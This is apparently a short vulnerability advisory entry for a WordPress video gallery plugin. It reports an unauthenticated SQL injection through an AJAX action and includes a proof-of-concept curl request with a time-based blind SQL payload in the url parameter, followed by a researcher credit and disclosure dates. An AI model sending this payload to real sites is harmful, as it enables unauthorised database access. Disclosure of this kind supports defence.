The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users
curl -s http://example.com/wp-admin/admin-ajax.php \ --data 'action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(5)))uPaz)%2523'
cydave
cydave
Yes
2022-04-13 (about 1 years ago)
2022-04-13 (about 1 years ago)
2022-04-18 (about 1 years ago)